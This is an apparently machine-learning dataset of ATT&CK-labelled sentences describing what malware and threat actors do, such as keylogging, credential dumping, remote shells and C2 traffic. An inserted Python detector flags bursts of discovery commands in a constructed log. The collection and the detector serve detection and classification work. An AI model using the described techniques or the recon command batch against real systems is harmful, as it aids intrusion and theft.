{"text1":"can obtain network information, including DNS, IP, and proxies.","labels":"['T1016']"}
|
|
{"text1":"can obtain passwords from common browsers and FTP clients.","labels":"['T1003', 'T1552.001']"}
|
|
{"text1":"can obtain running services on the victim.","labels":"['T1007']"}
|
|
{"text1":"can obtain screenshots from the victim.","labels":"['T1113']"}
|
|
{"text1":"can obtain the computer name, OS version, and default language identifier.","labels":"['T1082']"}
|
|
{"text1":"can obtain the date and time of a system.","labels":"['T1124']"}
|
|
{"text1":"can obtain the victim user name.","labels":"['T1033', 'T1069']"}
|
|
{"text1":"can open an interactive command-shell to perform command line functions on victim machines.","labels":"['T1059']"}
|
|
{"text1":"can open the Windows Firewall on the victim\u2019s machine to allow incoming connections.","labels":"['T1562.001']"}
|
|
{"text1":"can overwrite Registry settings to reduce its visibility on the victim.","labels":"['T1070']"}
|
|
{"text1":"can perform DLL injection.","labels":"['T1055']"}
|
|
{"text1":"can perform DLL loading.","labels":"['T1055']"}
|
|
{"text1":"can perform keylogging.","labels":"['T1056']"}
|
|
{"text1":"can perform pass the hash.","labels":"['T1550.002']"}
|
|
{"text1":"can perform process injection by using a reflective DLL.","labels":"['T1055']"}
|
|
{"text1":"can perform screen captures of the victim\u2019s machine.","labels":"['T1113']"}
|
|
{"text1":"can provide a remote shell.","labels":"['T1059']"}
|
|
{"text1":"can query for information contained within the Windows Registry.","labels":"['T1012']"}
|
|
{"text1":"can query service configuration information.","labels":"['T1007']"}
|
|
{"text1":"can receive and execute commands with cmd.exe. It can also provide a reverse shell.","labels":"['T1059']"}
|
|
{"text1":"can record audio using any existing hardware recording devices.","labels":"['T1123']"}
|
|
{"text1":"can record keystrokes from both the keyboard and virtual keyboard.","labels":"['T1056']"}
|
|
{"text1":"can record sound using input audio devices.","labels":"['T1123']"}
|
|
{"text1":"can record the sounds from microphones on a computer.","labels":"['T1123']"}
|
|
{"text1":"can recover hashed passwords.","labels":"['T1003']"}
|
|
{"text1":"can remotely activate the victim\u2019s webcam to capture content.","labels":"['T1125']"}
|
|
{"text1":"can retrieve and execute additional payloads from the C2 server.","labels":"['T1105']"}
|
|
{"text1":"can retrieve information about the Windows domain.","labels":"['T1016']"}
|
|
{"text1":"can retrieve IP and network adapter configuration information from compromised hosts.","labels":"['T1016']"}
|
|
{"text1":"can retrieve OS name\/architecture and computer\/domain name information from compromised hosts.","labels":"['T1082']"}
|
|
{"text1":"can retrieve the current content of the user clipboard.","labels":"['T1115']"}
|
|
{"text1":"can retrieve usernames from compromised hosts.","labels":"['T1087']"}
|
|
{"text1":"can run a command on another machine using .","labels":"['T1569.002']"}
|
|
{"text1":"can run a copy of cmd.exe.","labels":"['T1059']"}
|
|
{"text1":"can run to gather information about the victim.","labels":"['T1082']"}
|
|
{"text1":"can scan for open TCP ports on the target network.","labels":"['T1046']"}
|
|
{"text1":"can scan local network for open SMB.","labels":"['T1135']"}
|
|
{"text1":"can scan victim drives to look for specific banking software on the machine to determine next actions. It also looks at browsing history and open tabs for specific strings.","labels":"['T1083']"}
|
|
{"text1":"can search directories for files on the victim\u2019s machine.","labels":"['T1083']"}
|
|
{"text1":"can set its \"beacon\" payload to reach out to the C2 server on an arbitrary and random interval. In addition, it will break large data sets into smaller chunks for exfiltration.","labels":"['T1029']"}
|
|
{"text1":"can sleep for a specific time and be set to communicate at specific intervals.","labels":"['T1029']"}
|
|
{"text1":"can sniff plaintext network credentials and use NBNS Spoofing to poison name services.","labels":"['T1557.001']"}
|
|
{"text1":"can spawn remote shells.","labels":"['T1059']"}
|
|
{"text1":"can start a VNC-based remote desktop server and tunnel the connection through the already established C2 channel.","labels":"['T1021.001']"}
|
|
{"text1":"can start SOCKS proxy threads.","labels":"['T1090']"}
|
|
{"text1":"can steal access tokens from existing processes and make tokens from known credentials.","labels":"['T1134']"}
|
|
{"text1":"can steal clipboard contents.","labels":"['T1115']"}
|
|
{"text1":"can switch to a new C2 channel if the current one is broken.","labels":"['T1008']"}
|
|
{"text1":"can take a desktop screenshot and save the file into \\ProgramData\\Mail\\MailAg\\shot.png.","labels":"['T1113']"}
|
|
{"text1":"can take regular screenshots when certain applications are open that are sent to the command and control server.","labels":"['T1113']"}
|
|
{"text1":"can take screenshots.","labels":"['T1113']"}
|
|
{"text1":"can take screenshots of the desktop and target application windows, saving them to user directories as one byte XOR encrypted .dat files.","labels":"['T1113']"}
|
|
{"text1":"can terminate a specific process by its process id.","labels":"['T1543.003']"}
|
|
{"text1":"can timestomp files on victims using a Web shell.","labels":"['T1070.006']"}
|
|
{"text1":"can track key presses with a keylogger module.","labels":"['T1056']"}
|
|
{"text1":"can uninstall malware components using a batch script. Additionally, a malicious Word document used for delivery uses VBA macros for execution.","labels":"['T1064']"}
|
|
{"text1":"can upload, download, and execute files on the victim.","labels":"['T1105']"}
|
|
{"text1":"can upload and download files.","labels":"['T1105']"}
|
|
{"text1":"can upload and download files to the victim.","labels":"['T1105']"}
|
|
{"text1":"can upload and download to\/from a victim machine.","labels":"['T1105']"}
|
|
{"text1":"can upload files from compromised hosts.","labels":"['T1005']"}
|
|
{"text1":"can upload files to the victim's machine for operations.","labels":"['T1105']"}
|
|
{"text1":"can upload files to the victim\u2019s machine and can download additional payloads.","labels":"['T1105']"}
|
|
{"text1":"can use a number of known techniques to bypass Windows UAC.","labels":"['T1548.002']"}
|
|
{"text1":"can use DCOM (targeting the 127.0.0.1 loopback address) to execute additional payloads on compromised hosts.","labels":"['T1021.003']"}
|
|
{"text1":"can use DDE to execute additional payloads on compromised hosts.","labels":"['T1559.002']"}
|
|
{"text1":"can use HTTP and DNS for C2 communications.","labels":"['T1071']"}
|
|
{"text1":"can use HTTP for C2.","labels":"['T1071']"}
|
|
{"text1":"can use HTTP or DNS for C2.","labels":"['T1071']"}
|
|
{"text1":"can use HTTP or HTTPS for command and control to hard-coded C2 servers.","labels":"['T1071']"}
|
|
{"text1":"can use HTTP or SMTP for C2.","labels":"['T1071']"}
|
|
{"text1":"can use known credentials to run commands and spawn processes as another user.","labels":"['T1078']"}
|
|
{"text1":"can use MS10-061 to exploit a print spooler vulnerability in a remote system with a shared printer in order to move laterally.","labels":"['T1210']"}
|
|
{"text1":"can use Mshta.exe to execute additional payloads on compromised hosts.","labels":"['T1218.005']"}
|
|
{"text1":"can use MSHTA to serve additional payloads.","labels":"['T1218.005']"}
|
|
{"text1":"can use Obfs3, a pluggable transport, to add another layer of encryption and obfuscate TLS.","labels":"['T1573']"}
|
|
{"text1":"can use port 995 for C2.","labels":"['T1571']"}
|
|
{"text1":"can use PowerSploit or other scripting frameworks to perform execution.","labels":"['T1064']"}
|
|
{"text1":"can use process hollowing for execution.","labels":"['T1055.012']"}
|
|
{"text1":"can use PowerView to perform \u201cnet user\u201d commands and create local system and domain accounts.","labels":"['T1136']"}
|
|
{"text1":"can use Rundll32 to execute additional payloads.","labels":"['T1218.011']"}
|
|
{"text1":"can use SSL and TLS for communications.","labels":"['T1573']"}
|
|
{"text1":"can use tasklist to collect a list of running tasks.","labels":"['T1057']"}
|
|
{"text1":"can use the command-line utility cacls.exe to change file permissions.","labels":"['T1059', 'T1222']"}
|
|
{"text1":"can use the Windows API function CreateProcess to execute another process.","labels":"['T1106']"}
|
|
{"text1":"can use Windows admin shares (C$ and ADMIN$) for lateral movement.","labels":"['T1021.002']"}
|
|
{"text1":"can use Windows Authentication Packages for persistence.","labels":"['T1547.002']"}
|
|
{"text1":"can use WinRM to execute a payload on a remote host.","labels":"['T1021.006']"}
|
|
{"text1":"can use WMI queries to gather system information.","labels":"['T1047']"}
|
|
{"text1":"can use WMI queries to retrieve data from compromised hosts.","labels":"['T1047']"}
|
|
{"text1":"can use WMI to execute commands.","labels":"['T1047']"}
|
|
{"text1":"can wipe drives using Remove-Item commands.","labels":"['T1070.004']"}
|
|
{"text1":"can write and execute PowerShell scripts.","labels":"['T1059.001']"}
|
|
{"text1":"captured screenshots and desktop video recordings.","labels":"['T1113']"}
|
|
{"text1":"captured screenshots and sent them out to a C2 server.","labels":"['T1113']"}
|
|
{"text1":"captures and DES-encrypts credentials before writing the username and password to a log file, C:\\log.txt.","labels":"['T1056']"}
|
|
{"text1":"captures hashes and credentials that are sent to the system after the name services have been poisoned.","labels":"['T1040']"}
|
|
{"text1":"captures keystrokes and sends them back to the C2 server.","labels":"['T1056']"}
|
|
{"text1":"captures screenshots based on specific keywords in the window\u2019s title.","labels":"['T1113']"}
|
|
{"text1":"captures screenshots of the infected system.","labels":"['T1113']"}
|
|
{"text1":"captures screenshots of the victim\u2019s screen.","labels":"['T1113']"}
|
|
{"text1":"captures the content of the desktop with the screencapture binary.","labels":"['T1113']"}
|
|
{"text1":"checks for anti-virus, forensics, and virtualization software.","labels":"['T1518.001']"}
|
|
{"text1":"checks for new hard drives on the victim, such as USB devices, by listening for the WM_DEVICECHANGE window message.","labels":"['T1120']"}
|
|
{"text1":"checks for processes associated with anti-virus vendors.","labels":"['T1518.001']"}
|
|
{"text1":"checks for sandboxing libraries and debugging tools.","labels":"['T1518.001']"}
|
|
{"text1":"checks for the existence of anti-virus.","labels":"['T1518.001']"}
|
|
{"text1":"checks for the presence of Bitdefender security software.","labels":"['T1518.001']"}
|
|
{"text1":"checks if a value exists within a Registry key in the HKCU hive whose name is the same as the scheduled task it has created.","labels":"['T1012']"}
|
|
{"text1":"checks if the victim OS is 32 or 64-bit.","labels":"['T1082']"}
|
|
{"text1":"checks its parent process for indications that it is running in a sandbox setup.","labels":"['T1057']"}
|
|
{"text1":"checks the Registry key HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings for proxy configurations information.","labels":"['T1012']"}
|
|
{"text1":"checks the running processes for evidence it may be running in a sandbox environment. It specifically enumerates processes for Wireshark and Sysinternals.","labels":"['T1057']"}
|
|
{"text1":"cleared Windows event logs and other logs produced by tools they used, including system, security, terminal services, remote services, and audit logs. The actors also deleted specific Registry keys.","labels":"['T1070']"}
|
|
{"text1":"clears event logs.","labels":"['T1070']"}
|
|
{"text1":"clears the system event logs.","labels":"['T1070']"}
|
|
{"text1":"code may be obfuscated through structured exception handling and return-oriented programming.","labels":"['T1027']"}
|
|
{"text1":"collected complete contents of the 'Pictures' folder from compromised Windows systems.","labels":"['T1005']"}
|
|
{"text1":"collected data from local victim systems.","labels":"['T1005']"}
|
|
{"text1":"collected file listings of all default Windows directories.","labels":"['T1083']"}
|
|
{"text1":"collected system architecture information. used an HTTP malware variant and a Port 22 malware variant to gather the hostname and CPU information from the victim\u2019s machine.","labels":"['T1082']"}
|
|
{"text1":"collected the victim computer name, OS version, and architecture type and sent the information to its C2 server. also enumerated all available drives on the victim's machine.","labels":"['T1082']"}
|
|
{"text1":"collected the victim username and whether it was running as admin, then sent the information to its C2 server.","labels":"['T1033']"}
|
|
{"text1":"collects, compresses, encrypts, and exfiltrates data to the C2 server every 10 minutes.","labels":"['T1029']"}
|
|
{"text1":"collects a list of active and listening connections by using the command netstat -nao as well as a list of available network mappings with net use.","labels":"['T1049']"}
|
|
{"text1":"collects a list of files and directories in C:\\ with the command dir \/s \/a c:\\ >> \"C:\\windows\\TEMP\\[RANDOM].tmp\".","labels":"['T1083']"}
|
|
{"text1":"collects a list of installed programs and services on the system.","labels":"['T1007']"}
|
|
{"text1":"collects a list of network shares with the command net share.","labels":"['T1135']"}
|
|
{"text1":"collects a list of running services with the command tasklist \/svc.","labels":"['T1007']"}
|
|
{"text1":"collects a unique identifier (UID) from a compromised host.","labels":"['T1082']"}
|
|
{"text1":"collects data from the clipboard.","labels":"['T1115']"}
|
|
{"text1":"collects data from the local victim system.","labels":"['T1005']"}
|
|
{"text1":"collects data stored in the clipboard.","labels":"['T1115']"}
|
|
{"text1":"collects endpoint information using the systeminfo command.","labels":"['T1082']"}
|
|
{"text1":"collects files with the following extensions: .ppt, .pptx, .pdf, .doc, .docx, .xls, .xlsx, .docm, .rtf, .inp, .xlsm, .csv, .odt, .pps, .vcf and sends them back to the C2 server.","labels":"['T1005']"}
|
|
{"text1":"collects general system enumeration data about the infected machine and checks the OS version.","labels":"['T1082']"}
|
|
{"text1":"collects hard drive content and system configuration information.","labels":"['T1082']"}
|
|
{"text1":"collects information about available drives, default browser, desktop file list, My Documents, Internet history, program files, and root of available drives. It also searches for ICS-related software files.","labels":"['T1083']"}
|
|
{"text1":"collects information about running processes.","labels":"['T1057']"}
|
|
{"text1":"collects information about running processes from victims.","labels":"['T1057']"}
|
|
{"text1":"collects information about the OS and computer name.","labels":"['T1082']"}
|
|
{"text1":"collects information from the victim, including installed drivers, programs previously executed by users, programs and services configured to automatically run at startup, files and folders present in any user's home folder, files and folders present in any user's My Documents, programs installed to the Program Files folder, and recently accessed files, folders, and programs.","labels":"['T1083']"}
|
|
{"text1":"collects information on network settings and Internet proxy settings from the victim.","labels":"['T1016']"}
|
|
{"text1":"collects information on running processes and environment variables from the victim.","labels":"['T1057']"}
|
|
{"text1":"collects its process identifier (PID) on the victim.","labels":"['T1057']"}
|
|
{"text1":"collects Keychain storage data and copies those passwords\/tokens to a file.","labels":"['T1555.001']"}
|
|
{"text1":"collects keystrokes from the victim machine.","labels":"['T1056']"}
|
|
{"text1":"collects keystrokes from the victim\u2019s machine.","labels":"['T1056']"}
|
|
{"text1":"collects local files and information from the victim\u2019s local machine.","labels":"['T1005']"}
|
|
{"text1":"collects MAC address and local IP address information from the victim.","labels":"['T1016']"}
|
|
{"text1":"collects network adapter and interface information by using the commands ipconfig \/all, arp -a and route print. It also collects the system's MAC address with getmac and domain configuration with net config workstation.","labels":"['T1016']"}
|
|
{"text1":"collects OS version information such as registered owner details, manufacturer details, processor type, available storage, installed patches, hostname, version info, system date, and other system information by using the commands systeminfo, net config workstation, hostname, ver, set, and date \/t.","labels":"['T1082']"}
|
|
{"text1":"collects password policy information with the command net accounts.","labels":"['T1201']"}
|
|
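The records above list the same handful of discovery commands again and again (netstat and net use, dir /s, tasklist /svc, net share, ipconfig/arp/route/getmac/net config, systeminfo/hostname/ver/set/date, net accounts). What makes them worth alerting on is not any one command but the batch: several distinct techniques spawned by one parent within seconds. The following is an added example, not code from the page or from any of the tools the records describe; the `ts|host|ppid|cmdline` log format and the sample lines are constructed, and the five-minute window and the three-technique threshold are assumptions to tune.

```python
"""Flag bursts of host-discovery commands in process-creation telemetry.

Added example, not code from the page. The rules map the commands named in
the records above to the technique IDs those records carry. The log lines
are constructed, in a made-up 'ts|host|ppid|cmdline' format, not real
telemetry.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# (regex applied to the normalised command line, technique ID from the records)
RULES = [
    (r"^netstat\b", "T1049"),
    (r"^net\s+use\b", "T1049"),
    (r"^dir\b.*\s/s\b", "T1083"),
    (r"^tasklist\b.*\s/svc\b", "T1007"),
    (r"^net\s+share\b", "T1135"),
    (r"^(ipconfig|arp|route|getmac)\b", "T1016"),
    (r"^net\s+config\s+workstation\b", "T1016"),
    (r"^(systeminfo|hostname|ver|set|date)\b", "T1082"),
    (r"^net\s+accounts\b", "T1201"),
]
COMPILED = [(re.compile(p, re.IGNORECASE), tech) for p, tech in RULES]

# 'cmd.exe /c <command>' wrapper, with or without a full path and quotes.
CMD_WRAPPER = re.compile(r'^"?(?:[A-Za-z]:\\[^"]*\\)?cmd(?:\.exe)?"?\s+/[cCkK]\s+(.*)$')
# First token: optional drive path, bare name, optional .exe, optional closing quote.
FIRST_TOKEN = re.compile(r'^"?(?:[A-Za-z]:\\[^\s"]*\\)?([A-Za-z0-9_-]+?)(?:\.exe)?"?(?=\s|$)')


def normalize(cmdline: str) -> str:
    """Strip a cmd.exe wrapper, then the directory and .exe suffix of the first
    token, so that the rules only have to match the bare verb."""
    s = cmdline.strip()
    m = CMD_WRAPPER.match(s)
    if m:
        s = m.group(1).strip().strip('"')
    return FIRST_TOKEN.sub(r"\1", s, count=1)


def classify(cmdline: str) -> set:
    """Technique IDs for one command line; empty set if it is not a discovery command."""
    norm = normalize(cmdline)
    return {tech for rx, tech in COMPILED if rx.search(norm)}


def parse_line(line: str) -> dict:
    """Parse one constructed 'ts|host|ppid|cmdline' record."""
    ts, host, ppid, cmdline = line.split("|", 3)
    return {"ts": datetime.fromisoformat(ts), "host": host, "ppid": int(ppid), "cmdline": cmdline}


def find_bursts(events, window=timedelta(minutes=5), min_techniques=3):
    """Alert when one parent process on one host spawns commands covering at
    least `min_techniques` distinct discovery techniques inside `window`.
    A lone ipconfig is noise; systeminfo + net config + netstat + dir /s in
    ten seconds is the recon batch the records above describe."""
    by_parent = defaultdict(list)
    for ev in events:
        techs = classify(ev["cmdline"])
        if techs:
            by_parent[(ev["host"], ev["ppid"])].append((ev["ts"], techs, ev["cmdline"]))
    alerts = []
    for (host, ppid), rows in by_parent.items():
        rows.sort(key=lambda r: r[0])
        for i, (t0, _, _) in enumerate(rows):
            in_window = [r for r in rows[i:] if r[0] - t0 <= window]
            seen = set().union(*(r[1] for r in in_window))
            if len(seen) >= min_techniques:
                alerts.append({"host": host, "ppid": ppid, "techniques": sorted(seen),
                               "commands": [r[2] for r in in_window]})
                break  # one alert per parent process is enough
    return alerts


# Constructed sample: WS01 runs the whole recon batch from one cmd.exe parent in
# ten seconds; WS02 runs two unrelated commands eleven minutes apart.
SAMPLE_LOG = """\
2024-03-01T10:00:01|WS01|4120|C:\\Windows\\System32\\cmd.exe /c systeminfo
2024-03-01T10:00:03|WS01|4120|C:\\Windows\\System32\\net.exe config workstation
2024-03-01T10:00:05|WS01|4120|cmd.exe /c dir /s /a c:\\ >> "C:\\windows\\TEMP\\a1b2.tmp"
2024-03-01T10:00:07|WS01|4120|netstat -nao
2024-03-01T10:00:09|WS01|4120|C:\\Windows\\System32\\net.exe accounts
2024-03-01T10:00:11|WS01|4120|tasklist /svc
2024-03-01T10:04:00|WS02|2208|ipconfig /all
2024-03-01T10:15:00|WS02|2208|C:\\Windows\\System32\\cmd.exe /c ver
"""

if __name__ == "__main__":
    for alert in find_bursts(parse_line(l) for l in SAMPLE_LOG.splitlines()):
        print(alert)
```

Run against real Sysmon Event ID 1 or Security 4688 data, the parent process identifier is the pivot: a recon batch spawned from an Office process, a web server worker or a service host is far more interesting than the same commands typed in an administrator's console.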
{"text1":"collects system information from the victim, including CPU speed, computer name, volume serial number, ANSI code page, OEM code page identifier for the OS, Microsoft Windows version, and memory information.","labels":"['T1082']"}
|
|
{"text1":"collects the account name of the logged-in user and sends it to the C2.","labels":"['T1033']"}
|
|
{"text1":"collects the computer name, OS versioning information, and OS install date and sends the information to the C2.","labels":"['T1082']"}
|
|
{"text1":"collects the computer name, the BIOS model, and execution path.","labels":"['T1082']"}
|
|
{"text1":"collects the computer name and host name on the compromised system.","labels":"['T1082']"}
|
|
{"text1":"collects the computer name and serial number for the storage volume C:\\.","labels":"['T1082']"}
|
|
{"text1":"collects the current username and sends it to the C2 server.","labels":"['T1033']"}
|
|
{"text1":"collects the current username from the victim.","labels":"['T1033']"}
|
|
{"text1":"collects the domain name from a compromised host.","labels":"['T1016']"}
|
|
{"text1":"collects the endpoint victim's username and uses it as a basis for downloading additional components from the C2 server.","labels":"['T1033']"}
|
|
{"text1":"collects the group name of the logged-in user and sends it to the C2.","labels":"['T1069']"}
|
|
{"text1":"collects the hostname of the victim machine.","labels":"['T1082']"}
|
|
{"text1":"collects the keychains on the system.","labels":"['T1555.001']"}
|
|
{"text1":"collects the local IP address of the victim and sends it to the C2.","labels":"['T1016']"}
|
|
{"text1":"collects the MAC address, computer name, and CPU information.","labels":"['T1082']"}
|
|
{"text1":"collects the network adapter\u2019s IP and MAC address as well as IP addresses of the network adapter\u2019s default gateway, primary\/secondary WINS, DHCP, and DNS servers, and saves them into a log file.","labels":"['T1016']"}
|
|
{"text1":"collects the OS name, machine name, and architecture information.","labels":"['T1082']"}
|
|
{"text1":"collects the OS version, country name, MAC address, computer name, physical memory statistics, and volume information for all drives on the system.","labels":"['T1082']"}
|
|
{"text1":"collects the OS version and computer name.","labels":"['T1082']"}
|
|
{"text1":"collects the system information, including hostname and OS version, and sends it to the C2 server.","labels":"['T1082']"}
|
|
{"text1":"collects the system name, OS version including service pack, and system install date and sends the information to the C2 server.","labels":"['T1082']"}
|
|
{"text1":"collects the username from the victim\u2019s machine.","labels":"['T1033']"}
|
|
{"text1":"collects the users of the system.","labels":"['T1087']"}
|
|
{"text1":"collects the victim's IP address.","labels":"['T1016']"}
|
|
{"text1":"collects the victim's username.","labels":"['T1033']"}
|
|
{"text1":"collects the victim IP address, MAC address, as well as the victim account domain name.","labels":"['T1016']"}
|
|
{"text1":"collects the victim LAN IP address and sends it to the C2 server.","labels":"['T1016']"}
|
|
{"text1":"collects the victim\u2019s computer name, processor architecture, OS version, and volume serial number.","labels":"['T1082']"}
|
|
{"text1":"collects the victim\u2019s username and whether that user is an admin.","labels":"['T1033']"}
|
|
{"text1":"collects the volumes mapped on the system, and also steals files with the following extensions: .docx, .doc, .pptx, .ppt, .xlsx, .xls, .rtf, and .pdf.","labels":"['T1083']"}
|
|
{"text1":"collects user files from the compromised host based on predefined file extensions.","labels":"['T1005']"}
|
|
{"text1":"collects various information via WMI requests, including CPU information in the Win32_Processor entry (Processor ID, Name, Manufacturer and the clock speed).","labels":"['T1047']"}
|
|
{"text1":"command and control occurs via HTTPS over port 443.","labels":"['T1043', 'T1071']"}
|
|
{"text1":"Commands such as net group and net localgroup can be used in to gather information about and manipulate groups.","labels":"['T1069']"}
|
|
{"text1":"Commands such as net view can be used in to gather information about available remote systems.","labels":"['T1018']"}
|
|
{"text1":"Commands under net user can be used in to gather information about and manipulate user accounts.","labels":"['T1087']"}
|
|
{"text1":"commonly created Web shells on victims' publicly accessible email and web servers, which they used to maintain access to a victim network and download additional malicious files.","labels":"['T1505.003']"}
|
|
{"text1":"communicates over common ports such as TCP 80, 443, and 25.","labels":"['T1043']"}
|
|
{"text1":"communicates over HTTP for C2.","labels":"['T1071']"}
|
|
{"text1":"communicates over HTTP or HTTPS for C2.","labels":"['T1071']"}
|
|
{"text1":"communicates over ports 80, 443, 53, and 8080 via raw sockets instead of the protocols usually associated with the ports.","labels":"['T1043']"}
|
|
{"text1":"communicates to its C2 server over HTTP.","labels":"['T1071']"}
|
|
{"text1":"communicates to its C2 server over HTTP and embeds data within the Cookie HTTP header.","labels":"['T1071']"}
|
|
{"text1":"communicates to the C2 server by retrieving a Google Doc.","labels":"['T1102']"}
|
|
{"text1":"communicates using HTTPS and uses a custom encryption cipher to encrypt the HTTPS message body.","labels":"['T1573']"}
|
|
{"text1":"communicates via DNS for C2.","labels":"['T1071']"}
|
|
{"text1":"communicates via ICMP for C2.","labels":"['T1095']"}
|
|
{"text1":"communicates with its C2 server over HTTP.","labels":"['T1071']"}
|
|
{"text1":"communicates with its C2 server over HTTPS.","labels":"['T1071']"}
|
|
{"text1":"communicates with its C2 server over TCP port 3728.","labels":"['T1571']"}
|
|
{"text1":"communicates with its C2 servers over HTTP.","labels":"['T1071']"}
|
|
{"text1":"communicates with its C2 servers through a TCP socket.","labels":"['T1095']"}
|
|
{"text1":"completes network communication via raw sockets.","labels":"['T1095']"}
|
|
{"text1":"compressed data with zlib prior to sending it over C2.","labels":"['T1560']"}
|
|
{"text1":"compresses collected files with both the GZipStream class and a simple character replacement scheme before sending them to its C2 server.","labels":"['T1560']"}
|
|
{"text1":"compresses output data generated by command execution with a custom implementation of the Lempel\u2013Ziv\u2013Welch (LZW) algorithm.","labels":"['T1560']"}
|
|
{"text1":"compromised legitimate organizations' websites to create watering holes to compromise victims.","labels":"['T1189']"}
|
|
{"text1":"compromised McAfee ePO to move laterally by distributing malware as a software deployment task.","labels":"['T1072']"}
|
|
{"text1":"compromised three Japanese websites using a Flash exploit to perform watering hole attacks.","labels":"['T1189']"}
|
|
{"text1":"compromised user credentials and used valid accounts for operations.","labels":"['T1078']"}
|
|
{"text1":"concatenates then decompresses multiple resources to load an embedded .Net Framework assembly.","labels":"['T1140']"}
|
|
{"text1":"conducts brute force attacks against SSH services to gain initial access.","labels":"['T1110']"}
|
|
{"text1":"conducts credential dumping on victims, with a focus on obtaining credentials belonging to domain and database servers.","labels":"['T1003']"}
|
|
{"text1":"configured its payload to inject into the rundll32.exe.","labels":"['T1218.011']"}
|
|
{"text1":"configures itself as a service.","labels":"['T1543.003']"}
|
|
{"text1":"connects over 443 for C2.","labels":"['T1043']"}
|
|
{"text1":"connects to a predefined domain on port 443 to exfil gathered information.","labels":"['T1048']"}
|
|
{"text1":"connects to C2 infrastructure and establishes backdoors over a custom communications protocol.","labels":"['T1095']"}
|
|
{"text1":"connects to external C2 infrastructure over the HTTP port.","labels":"['T1043']"}
|
|
{"text1":"connects to port 80 of a C2 server using Wininet API.","labels":"['T1071']"}
|
|
{"text1":"contains a .NET wrapper DLL for creating and managing scheduled tasks for maintaining persistence upon reboot.","labels":"['T1053.005']"}
|
|
{"text1":"contains a cleanup module that removes traces of itself from the victim.","labels":"['T1070.004']"}
|
|
{"text1":"contains a collection of CodeExecution modules that enable by injecting code (DLL, shellcode) or reflectively loading a Windows PE file into a process.","labels":"['T1055']"}
|
|
{"text1":"contains a collection of Exfiltration modules that can access data from local files, volumes, and processes.","labels":"['T1005']"}
|
|
{"text1":"contains a collection of Exfiltration modules that can harvest credentials from Group Policy Preferences, Windows vault credential objects, or using .","labels":"['T1003']"}
|
|
{"text1":"contains a collection of Privesc-PowerUp modules that can discover and exploit DLL hijacking opportunities in services and processes.","labels":"['T1574.001']"}
|
|
{"text1":"contains a collection of Privesc-PowerUp modules that can discover and exploit various path interception opportunities in services, processes, and variables.","labels":"['T1034']"}
|
|
{"text1":"contains a collection of Privesc-PowerUp modules that can discover and replace\/modify service binaries, paths, and configs.","labels":"['T1543.003']"}
|
|
{"text1":"contains a collection of Privesc-PowerUp modules that can query Registry keys for potential opportunities.","labels":"['T1012']"}
|
|
{"text1":"contains a command to collect and exfiltrate emails from Outlook.","labels":"['T1114']"}
|
|
{"text1":"contains a command to collect information about anti-virus software on the victim.","labels":"['T1518.001']"}
|
|
{"text1":"contains a command to collect the victim MAC address and LAN IP.","labels":"['T1016']"}
|
|
{"text1":"contains a command to collect the victim PC name and operating system.","labels":"['T1082']"}
|
|
{"text1":"contains a command to download and execute a file from a remotely hosted URL using WinINet HTTP requests.","labels":"['T1105']"}
|
|
{"text1":"contains a command to perform screen captures.","labels":"['T1113']"}
|
|
{"text1":"contains a command to retrieve files from its C2 server.","labels":"['T1105']"}
|
|
{"text1":"contains a copy of the OpenSSL library to encrypt C2 traffic.","labels":"['T1573']"}
|
|
{"text1":"contains a custom version of the RC4 algorithm that includes a programming error.","labels":"['T1573']"}
|
|
{"text1":"contains a keylogger component.","labels":"['T1056']"}
|
|
{"text1":"contains a keylogger module.","labels":"['T1056']"}
|
|
{"text1":"contains a keylogger module that collects keystrokes and the titles of foreground windows.","labels":"['T1056']"}
|
|
{"text1":"contains a module that captures screenshots of the victim's desktop.","labels":"['T1113']"}
|
|
{"text1":"contains a module that collects documents with certain extensions from removable media or fixed drives connected via USB.","labels":"['T1025']"}
|
|
{"text1":"contains a module to steal credentials from Web browsers on the victim machine.","labels":"['T1003']"}
|
|
{"text1":"contains base64-encoded strings.","labels":"['T1027']"}
|
|
{"text1":"contains code to clear event logs.","labels":"['T1070']"}
|
|
{"text1":"contains code to delete files from the victim\u2019s machine.","labels":"['T1070.004']"}
|
|
{"text1":"contains code to open and copy data from the clipboard.","labels":"['T1115']"}
|
|
{"text1":"contains commands to list files and directories, as well as search for files matching certain extensions from a defined list.","labels":"['T1083']"}
|
|
{"text1":"contains functionality to collect information from the clipboard.","labels":"['T1115']"}
|
|
{"text1":"contains junk code in its binary, likely to confuse malware analysts.","labels":"['T1027.001']"}
|
|
{"text1":"contains junk code in its functions in an effort to confuse disassembly programs.","labels":"['T1027.001']"}
|
|
{"text1":"contains keylogger functionality.","labels":"['T1056']"}
|
|
{"text1":"contains keylogging functionality that will monitor for active application windows and write them to the log, it can handle special characters, and it will buffer by default 50 characters before sending them out over the C2 infrastructure.","labels":"['T1056']"}
|
|
{"text1":"contains keylogging functionality to steal passwords.","labels":"['T1056']"}
|
|
{"text1":"contains many methods for bypassing Windows User Account Control on multiple versions of the operating system.","labels":"['T1548.002']"}
|
|
{"text1":"contains modules to infect USB sticks and spread laterally to other Windows systems the stick is plugged into using autorun functionality.","labels":"['T1091']"}
|
|
{"text1":"contains screen capture functionality.","labels":"['T1113']"}
|
|
{"text1":"contains the execFile function to execute a specified file on the system using the NSTask:launch method.","labels":"['T1106']"}
|
|
{"text1":"contains the ftpUpload function to use the FTPManager:uploadFile method to upload files from the target system.","labels":"['T1071']"}
|
|
{"text1":"contains the getFirefoxPassword function to attempt to locate Firefox passwords.","labels":"['T1552.001']"}
|
|
{"text1":"contains the getInfoOSX function to return the OS X version as well as the current user.","labels":"['T1033']"}
|
|
{"text1":"contains the getInstalledAPP function to run ls -la \/Applications to gather what applications are installed.","labels":"['T1082']"}
|
|
{"text1":"contains the readFiles function to return a detailed listing (sometimes recursive) of a specified directory.","labels":"['T1083']"}
|
|
{"text1":"contains the showBackupIosFolder function to check for IOS device backups by running ls -la ~\/Library\/Application\\ Support\/MobileSync\/Backup\/.","labels":"['T1120']"}
|
|
{"text1":"contains the takeScreenShot (along with startTakeScreenShot and stopTakeScreenShot) functions to take screenshots using the CGGetActiveDisplayList, CGDisplayCreateImage, and NSImage:initWithCGImage methods.","labels":"['T1113']"}
|
|
{"text1":"contains UAC bypass code for both 32- and 64-bit systems.","labels":"['T1548.002']"}
|
|
{"text1":"contains unused machine instructions in a likely attempt to hinder analysis.","labels":"['T1027.001']"}
|
|
{"text1":"copied all targeted files to a directory called index that was eventually uploaded to the C&C server.","labels":"['T1074']"}
|
|
